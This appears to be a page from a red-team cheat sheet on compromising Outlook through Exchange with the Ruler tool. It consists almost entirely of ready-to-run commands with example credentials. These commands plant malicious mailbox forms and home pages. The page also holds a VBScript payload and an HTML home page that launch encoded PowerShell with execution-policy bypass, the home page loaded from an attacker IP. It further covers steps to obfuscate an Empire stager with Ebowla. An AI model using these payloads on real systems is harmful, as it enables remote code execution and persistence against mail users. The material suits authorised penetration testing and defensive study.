Outlook

Ruler
​https://github.com/sensepost/ruler/releases​
Rules
​https://github.com/sensepost/ruler/wiki/Rules​
​https://silentbreaksecurity.com/malicious-outlook-rules/​
Forms
​https://github.com/sensepost/ruler/wiki/Forms​
​https://sensepost.com/blog/2017/outlook-forms-and-shells/​
Display forms:
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form display
Exploit:
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form add --suffix test-form --input vbs-payload.txt --send
vbs-payload.txt:
CreateObject("WScript.Shell").Run "powershell -exec bypass -enc <BASE64_CMD>", 0, false
Clean up:
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e snovvcra[email protected] --verbose --debug form delete --suffix test-form
Empire stager encryption:
$ grep -e output_type -e payload_type -e clean_output -e userdomain genetic.config
    output_type = GO
    payload_type = DLL_x64
    clean_output = True
        userdomain = 'MEGACORP'
$ python ebowla.py https443.dll genetic.config
$ ./build_x64_go.sh output/go_symmetric_https443.dll.go https443.exe --hidden
Homepage
​https://github.com/sensepost/ruler/wiki/Homepage​
​https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/​
Exploit:
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug homepage add --url http://10.10.13.37/homepage.html
homepage.html:
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
 Sub window_onload()
     Set Application = ViewCtl1.OutlookApplication
     Set cmd = Application.CreateObject("Wscript.Shell")
     cmd.Run("powershell -exec bypass -e <BASE64_CMD>")
 End Sub
-->
​
</script>
</head>
​
<body>
 <object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>
</body>
</html>
Clean up:
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug homepage delete
Stager encryption is the same as for Ruler/Forms.
Last modified 6mo ago